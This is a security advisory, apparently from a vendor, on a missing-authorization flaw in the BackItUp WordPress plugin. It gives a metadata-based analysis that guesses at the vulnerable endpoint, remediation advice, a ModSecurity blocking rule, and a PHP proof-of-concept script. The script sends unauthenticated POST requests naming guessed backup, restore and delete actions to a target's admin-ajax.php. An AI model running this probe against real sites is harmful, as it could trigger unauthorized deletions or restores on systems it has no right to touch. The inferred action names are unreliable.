Atomic Edge analysis of CVE-2025-68039 (metadata-based):
This vulnerability is a Missing Authorization flaw in the BackItUp WordPress plugin, affecting versions up to and including 2.1.0. The flaw allows unauthenticated attackers to trigger a privileged backend function, leading to unauthorized actions.
Atomic Edge research identifies the root cause as a missing capability check on a WordPress hook handler. The CWE-862 classification confirms the plugin fails to verify a user’s permission level before executing a function. Without access to the source code, this conclusion is inferred from the CWE and the standard WordPress plugin pattern where AJAX or admin-post endpoints register callback functions. The vulnerability likely involves a function registered via `add_action` for `wp_ajax_nopriv_`, `admin_post_nopriv_`, or a REST API route without proper `permission_callback`.
Exploitation requires sending a crafted HTTP request to the vulnerable endpoint. Based on WordPress plugin conventions and the plugin slug ‘wp-backitup’, the most probable attack vector is the WordPress AJAX handler. An attacker would send a POST request to `/wp-admin/admin-ajax.php` with an `action` parameter containing a value like `wp_backitup_` or `backitup_` followed by a specific action name. The exact action name is unknown, but common plugin actions include ‘run_backup’, ‘restore’, or ‘delete_log’. The payload would contain any parameters the vulnerable function expects.
Remediation requires adding a proper authorization check. The patched version must implement a capability check, such as `current_user_can(‘manage_options’)` or a plugin-specific capability, within the callback function. For REST API endpoints, a valid `permission_callback` function must be defined. For AJAX handlers, the function should be registered only under the authenticated `wp_ajax_` hook, not the `wp_ajax_nopriv_` hook, unless the action is intentionally public.
The direct impact is an unauthorized action performed by an unauthenticated attacker. The CVSS vector indicates a low impact on integrity (I:L) with no effect on confidentiality or availability. The specific action is not detailed, but in a backup plugin context, potential impacts include triggering resource-intensive backup or restore operations, deleting backup files or logs, or modifying plugin settings. This could lead to service disruption, data loss, or unauthorized configuration changes.
Here you will find our ModSecurity compatible rule to protect against this particular CVE.
# Atomic Edge WAF Rule - CVE-2025-68039 (metadata-based)
# This rule blocks unauthenticated access to BackItUp plugin AJAX actions.
# The rule is narrowly scoped to the plugin's likely AJAX endpoint and common action patterns.
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php"
"id:968039,phase:2,deny,status:403,chain,msg:'CVE-2025-68039 Missing Authorization in BackItUp plugin via AJAX',severity:'CRITICAL',tag:'CVE-2025-68039',tag:'WordPress',tag:'Plugin/BackItUp'"
SecRule ARGS_POST:action "@rx ^(wp_)?backitup_" "chain"
SecRule &ARGS_POST:_wpnonce "@eq 0"
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68039 - BackItUp <= 2.1.0 - Missing Authorization
<?php
/**
* Proof of Concept for CVE-2025-68039.
* This script attempts to trigger an unauthorized action in the BackItUp plugin.
* The exact AJAX action name is unknown and must be inferred or discovered.
* Common candidates are tested based on plugin functionality.
*/
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php'; // CHANGE THIS
// Common action prefixes and suffixes for the 'wp-backitup' plugin
$action_candidates = [
'wp_backitup_run_backup',
'backitup_run_backup',
'wp_backitup_restore',
'backitup_restore',
'wp_backitup_delete',
'backitup_delete',
'wp_backitup_cleanup',
'backitup_cleanup',
'wp_backitup_get_log',
'backitup_get_log'
];
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
foreach ($action_candidates as $action) {
$post_data = ['action' => $action];
// Some actions may require additional parameters; a minimal payload is used.
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo "[*] Testing action: {$action}n";
echo " HTTP Code: {$http_code}n";
// A successful trigger may return a 200 with plugin-specific JSON or message.
// A failure may return 0, 403, or a WordPress error.
if ($http_code == 200 && !empty($response)) {
echo " Response (first 200 chars): " . substr($response, 0, 200) . "n";
if (strpos($response, 'success') !== false || strpos($response, 'backup') !== false) {
echo "[!] POTENTIAL HIT for action: {$action}n";
}
}
echo "n";
}
curl_close($ch);
?>
